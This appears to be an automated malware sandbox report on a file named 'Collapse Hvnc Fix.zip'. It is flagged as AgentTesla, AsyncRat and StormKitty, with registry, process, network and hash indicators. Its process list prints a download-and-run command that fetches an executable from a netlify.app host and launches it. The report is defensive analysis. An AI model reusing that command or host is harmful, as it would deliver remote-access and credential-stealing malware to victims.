Analysis Overview
SHA256
d3627b91410ec6ecfab993fb446ecabe7a77186707fb3e454a956a9cc1bad087
Threat Level: Known bad
The file Collapse Hvnc Fix.zip was found to be: Known bad.
Malicious Activity Summary
Agenttesla family
AsyncRat
Async RAT payload
StormKitty payload
Stormkitty family
AgentTesla
Asyncrat family
AgentTesla payload
Async RAT payload
AgentTesla payload
Executes dropped EXE
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
Modifies Internet Explorer settings
Enumerates system info in registry
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-09-23 15:25
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Asyncrat family
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-23 15:24
Reported
2023-09-23 15:43
Platform
win10v2004-20230915-en
Max time kernel
150s
Max time network
157s
Command Line
Signatures
AgentTesla
AsyncRat
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Client.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Client.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000007b7dda1e9be7d901c0393f219be7d9018e5da6239be7d90114000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\Client.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1152 wrote to memory of 936 | N/A | C:\Users\Admin\Desktop\Client.exe | C:\Windows\System32\cmd.exe |
| PID 1152 wrote to memory of 936 | N/A | C:\Users\Admin\Desktop\Client.exe | C:\Windows\System32\cmd.exe |
| PID 936 wrote to memory of 3984 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 936 wrote to memory of 3984 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\" -spe -an -ai#7zMap28299:114:7zEvent17349
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe
"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\Client.exe
"C:\Users\Admin\Desktop\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe > "%TEMP%\aspnet_compiler.exe" & start /min "" "%TEMP%\aspnet_compiler.exe"
C:\Windows\system32\curl.exe
curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beautiful-genie-43cd26.netlify.app | udp |
| US | 44.217.161.11:443 | beautiful-genie-43cd26.netlify.app | tcp |
| US | 8.8.8.8:53 | 11.161.217.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:5552 | tcp | |
| N/A | 127.0.0.1:5552 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe
| MD5 | a2254ef4b20b21a3e1dcb7318217cadf |
| SHA1 | 8fb7e8e489f34968bf3bb26857208f392911b6d6 |
| SHA256 | 3c2caf7af685cb69b81d9469afbbbb397ca4480f61c7363ea711c5a11781ed18 |
| SHA512 | bd6bf9d3fc86c830eb10f2456b15f8d4c3d3da154b8b9c80eed22e30275310b0820136e96cc2fe0e06a0f57be8a5dc1ec85fd7fd0d64b62de4bee3f4697b3ef0 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe
| MD5 | a2254ef4b20b21a3e1dcb7318217cadf |
| SHA1 | 8fb7e8e489f34968bf3bb26857208f392911b6d6 |
| SHA256 | 3c2caf7af685cb69b81d9469afbbbb397ca4480f61c7363ea711c5a11781ed18 |
